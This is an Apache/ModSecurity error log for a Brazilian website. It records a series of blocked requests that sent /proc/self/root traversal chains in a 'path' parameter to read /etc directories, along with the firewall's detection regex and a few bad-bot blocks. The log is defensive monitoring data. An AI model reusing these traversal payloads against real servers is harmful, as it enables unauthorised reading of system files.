[Wed Mar 18 14:20:43.113234 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.241.31:48232] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre6ymAPhZkrhU8w4mRcgAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:44.393007 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.241.31:48246] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre7EzinOy1jxa1j4c-EwAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:45.710844 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:48260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre7da6ubjKNq_cu4bDHwAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:47.004763 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.241.31:48274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre7wkwaGbbGflqUZA2KgAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:51.487524 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.241.31:40194] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre88df6f5d65gmYZT5dwAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:53.791212 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:40200] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre9eoXxyEfFpUF8f-VcwAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:55.120811 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.241.31:40202] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre9-oXxyEfFpUF8f-VdgAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:58.622399 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.241.31:40214] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre-gkwaGbbGflqUZA2OAAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:21:02.569871 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.243.128:45986] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre_imAPhZkrhU8w4mRhwAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:21:06.214013 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:54194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrfAta6ubjKNq_cu4bDNAAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:21:15.130709 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.241.31:46336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrfCwkwaGbbGflqUZA2UQAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:23:12.373419 2026] [:error] [pid 11816:tid 140411666392832] [client 74.7.241.31:40482] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrfgOw_le52K8_3pV0CWAAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:23:26.333469 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.241.31:46384] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrfjimAPhZkrhU8w4mR5QAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:23:40.520973 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:40070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrfm-oXxyEfFpUF8f-V-wAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:23:49.655509 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.241.31:50250] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrfpfu8EFLIOrSqIpsnEQAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 14:24:07.535293 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:40718] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrft-oXxyEfFpUF8f-WJwAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:24:16.378496 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.243.128:44186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrfv-w_le52K8_3pV0CdwAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:24:21.612949 2026] [:error] [pid 14269:tid 140411658000128] [client 74.7.243.128:34290] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrfxQbLMZ6AikZjR9XkTgAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:24:22.111250 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.244.43:35828] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrfxkzinOy1jxa1j4c-2AAAARI"]
[Wed Mar 18 14:24:25.660980 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.228.61:33772] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrfyQkwaGbbGflqUZA2zgAAANA"]
[Wed Mar 18 14:24:47.930182 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.243.128:41668] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrf3wbLMZ6AikZjR9XkbQAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:24:54.519205 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:51066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrf5uoXxyEfFpUF8f-WPwAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:25:19.051093 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.241.31:48612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrf_0zinOy1jxa1j4c_HwAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
